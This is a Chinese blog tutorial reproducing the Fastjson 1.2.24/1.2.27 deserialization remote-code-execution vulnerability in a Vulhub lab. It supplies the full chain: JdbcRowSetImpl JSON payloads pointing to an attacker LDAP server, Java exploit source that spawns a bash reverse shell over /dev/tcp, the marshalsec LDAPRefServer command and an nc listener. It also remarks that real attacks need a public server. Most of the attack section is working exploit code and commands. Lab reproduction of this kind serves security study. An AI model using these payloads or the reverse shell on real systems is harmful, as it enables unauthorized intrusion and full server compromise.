入职大厂必会

写在前面的话：请注意本篇博客最后面的附（注意java版本），本篇博客采用的是LDAP服务getshell，rmi同理。阅读本篇博客需了解fastjson，ldap，rmi。

启动靶场

在终端里进入事先进入准备好的vulhub靶场目录下，

cd fastjson/1.2.24-rce/
sudo docker-compose up -d

执行命令后，看到如下图所示即为成功，此时可在浏览器中输入http://ip:8090，正常访问即为靶场启动成功。

漏洞发现

漏洞成因

从 fastjson 漏洞形成的原因看，是目标网站在解析 json 时，未对 json 内容进行验证，直接将 json 解析成 java 对象并执行，这就给了攻击者可乘之机，构造对应的 payload ，让系统执行，然后达到代码执行，甚至命令执行的目的。

寻找方式

寻找存在 Fastjson 漏洞的方法，就是先找到参数中内容是 json 数据的接口，然后使用构造好的测试 payload 进行提交验证，检测原理跟 sql 注入差不多，首先找到参数提交的地方，然后再用 payload 尝试。

明白寻找方式后，我们对靶场json进行测试，发现如下图所示

此时我们对红框中的GET改成POST，添加Content-Type字段为application/json，再添加请求参数，如下图所示：

可见返回来的结果被改变了，于是提交java对象试试，代码如下所示：

1.2.24:

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.75.144:1005/exp","autoCommit":true}
}

1.2.27:

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.75.144:1005/exp","autoCommit":true}
}

发现报错，说明存在fastjson漏洞。请求结果如下所示：

漏洞复现

此时声明一下我所使用的环境：

主机	IP	作用
Ubuntu22.04虚拟机	192.168.75.146	靶机
Win10虚拟机	192.168.75.144	攻击机

EXP

import java.lang.Runtime;
import java.lang.Process;public class exp {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.75.144/1004 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

准备一个简单的EXP，写Shell配置好反弹地址和端口后，使用javac进行编译：

javac C:\Users\Anonymous\Desktop\exp.java

编译完成后，通过phpstudy开启网站服务，（**如果是打实战的话，需要用到公网服务器做服务端getshell。）**然后将编译后的exp.class文件移动到www目录下。

marshalsec开启RMI或LDAP服务

攻击时还需要了解一个东西=>marshalsec，通过github可以获取到：

点我下载

下载成功后，需要使用maven对其进行编译，编译过程可在网上查找，此处不做过多叙述。

为什么需要marshalsec呢？答案是需要通过其开启RMI服务或LDAP服务。

这两个服务是干嘛的呢？答案在此，就不做多叙述。

点我查看答案

本篇博客采用的是LDAP服务进行攻击，接下来我们在攻击机上开启服务端，通过命令开启LDAP服务：

java -cp C:\Users\Anonymous\Desktop\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.75.144/#exp 1005

**记得改IP和端口还有文件名。**因为采用phpstudy搭建的服务端，默认端口为80可省略不写。

GetShell

上述准备工作做好后，新开一个终端，执行：

nc -lvp 1004

然后通过burp进行恶意请求，请求格式如下：

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.75.144:1005/exp","autoCommit":true}
}

发送请求后，我们可以看到没有返回结果，并且发送数据仍在进行中没有停下，请求过程如下图所示：

此时我们在反弹shell的终端里输入ls，可看到如下图所示：

可以看到成功拿到shell，至此，复现FastJson1.2.24及以下版本的漏洞利用到此结束。

附（RMI和LDAP对java的版本要求如下，本篇博客采用的java版本是8u181）：

（一）vulhub专栏：FastJson1.2.24、1.2.27漏洞复现相关推荐

【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
FastJson1.2.24反序列化导致任意命令执行漏洞复现（CVE-2017-18349）
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...
Fastjson1.2.47反序列化漏洞复现
一.漏洞描述 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中.Fastjson提供了autotype功能,允许用户在反序列化数据中通过&quo ...
Fastjson 1.2.24 反序列化漏洞复现
Fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎.Fastjson是其中的一个基于Java的JSON解析器/生成器. Pippo ...
Fastjson 1.2.24远程代码执行漏洞（com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl）
1.漏洞信息 1.1 漏洞简介 · 漏洞名称:Fastjson 1.2.24远程代码执行漏洞(com.sun.org.apache.xalan.internal.xsltc.trax.Template ...
fastjson 1.22-1.24 漏洞复现与分析
fastjson 1.22-1.24 漏洞复现与分析前言 QAQ,感觉自己啥也不会,要好好努力学习了.但是由于本人遗忘度很大,因此要记下来学习QAQ. 概念 RMI(Remote Method In ...
shiro550反序列化漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）
漏洞原理本文所有使用的脚本和工具都会在文末给出链接,希望读者可以耐心看到最后. 啥是shiro? Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证.授权.密码和会话管理. ...
docker kali安装mysql_kali安装docker(有效详细的教程) ——vulhub漏洞复现 001
前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间.在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错.( ...
健康计划用户输入身高(m)，体重(kg) 计算公式：BMI = 体重 / 身高^2 BMI ＜ 18.5:过轻 18.5≤ BMI ＜24:正常 24 ≤ BMI ＜27:过重 27
计算公式:BMI = 体重(kg) / 身高(m)^2 BMI < 18.5 :过轻 18.5 ≤ BMI < 24 :正常 24 ≤ BMI < 27 :过重 27 ≤ BMI & ...

（一）vulhub专栏：FastJson1.2.24、1.2.27漏洞复现